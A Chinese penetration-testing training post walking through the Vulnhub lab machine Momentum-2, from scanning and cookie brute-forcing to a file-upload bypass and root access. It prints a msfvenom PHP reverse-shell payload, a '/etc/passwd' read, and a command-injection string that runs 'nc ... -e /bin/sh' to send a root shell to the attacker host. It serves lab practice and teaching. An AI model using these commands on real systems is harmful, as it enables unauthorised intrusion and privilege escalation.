当前位置:网站首页 > 网络安全培训 > 正文

渗透测试实战-vulnhub靶机 momentum-2

freebuffreebuf 2021-07-23 275 0

本文来源:littlefresh

查看kali IP地址

ip a

1627054362_60fae11a89e649a5aaf5a.png

所在网段为 192.168.74.0/24

使用nmap扫描整个网段

nmap -v -sP 192.168.74.0/24

1627054373_60fae1252b887cb936199.png

扫描结果显示靶机地址疑似为 192.168.74.131

扫描该地址的端口情况

nmap -v -sV 192.168.74.131

1627054406_60fae146259f5ee86a4c0.png

发现只开放了22和80端口

尝试访问web服务

1627054422_60fae156dcafd642916a5.png

似乎只是个静态页面

查看网页源码

1627054431_60fae15f50783a03cdff9.png

没有什么特别的线索

扫描整个网站目录

dirb http://192.168.74.131/

1627054462_60fae17e0ba677306c26b.png

1627054484_60fae194283c96d071f18.png

1627054500_60fae1a47ea80fb2cb36d.png

1627054508_60fae1acabe579f21fb53.png

1627054529_60fae1c1f0a1fdade9cf1.png

这里文件上传到ajax.php进行处理,前端没有任何过滤限制

尝试上传一个jpg文件,上传失败,后端存在文件限制

查看ajax.php.bak

1627054617_60fae219405fe45af12ad.png

根据提示,一般情况只能上传成功txt文件,在存在cookie和secure参数后才能上传php文件

1627054626_60fae22200eb90195a5da.png

上传一个txt文件,发现上传的文件保存在owls下

1627054633_60fae229906a9086fcc60.png

未发现登录或者能够添加secure参数的接口,于是使用burpsuite抓包尝试

随便选择一个php文件上传拦截

1627054641_60fae231a5da421033a39.png

在repeater中添加cookie和secure字段

cookie最后一位未知,先以字母A代替

1627054716_60fae27cdfa5f1ca08145.png

进行cookie暴破

1627054745_60fae299791e44407807e.png

根据提示添加字典

1627054750_60fae29ed45d913e41d86.png

1627054778_60fae2ba42f20ecb77bbe.png

成功找出正确cookie并上传了php文件

1627054788_60fae2c4b3c365e73118a.png

用msf生成一个payload

msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.74.132 -o shell.php

1627054802_60fae2d29c7c2df089ee7.png

用同样的方法将shell.php上传上去

1627054808_60fae2d8742e542831a88.png

1627054822_60fae2e6c38b31cb340c1.png

进行连接

use exploit/multi/handler

set lhost 192.168.74.132

set payload php/meterpreter_reverse_tcp

run

1627054832_60fae2f03cfeb2d33a6cf.png

访问一下shell.php

1627054840_60fae2f8787e5b18fd765.png

连接上了

1627054847_60fae2ff1d3a5a1944d2a.png

使用python3弹回一个完整交互shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

1627054858_60fae30ab2c1e7b47c0c1.png

查看所有用户

cat /etc/passwd

1627054885_60fae325720dbb0f3022e.png

发现athena普通用户,寻找线索

找到一条flag

FLAG : 4WpJT9qXoQwFGeoRoFBEJZiM2j2Ad33gWipzZkStMLHw

1627054900_60fae334c21f5fd26cc17.png

password : myvulnerableapp[Asterisk]

1627054916_60fae3446d3338f464e76.png

1627055036_60fae3bc6d42ff58c62b1.png

根据密码提示猜测用户athena的密码  myvulnerableapp*  成功切换到athena用户

1627054926_60fae34ec29ec162eb8df.png

以athena的身份进行ssh连接

查看athena允许执行的命令

sudo -l

1627055095_60fae3f7b81910957da1a.png

以root权限执行这条命令

sudo python3 /home/team-tasks/cookie-gen.py

根据之前cookie-gen.py的源码分析,构造shellcode将root shell弹给kali

;nc 192.168.74.132 12138 -e /bin/sh

1627055175_60fae4473775fcdda95ce.png

在kali中进行监听

nc -nvlp 12138

1627055187_60fae4534ece9c9c3d353.png

转载请注明来自网盾网络安全培训,本文标题:《渗透测试实战-vulnhub靶机 momentum-2》

标签:渗透测试web安全

关于我

欢迎关注微信公众号

关于我们

网络安全培训,黑客培训,渗透培训,ctf,攻防

标签列表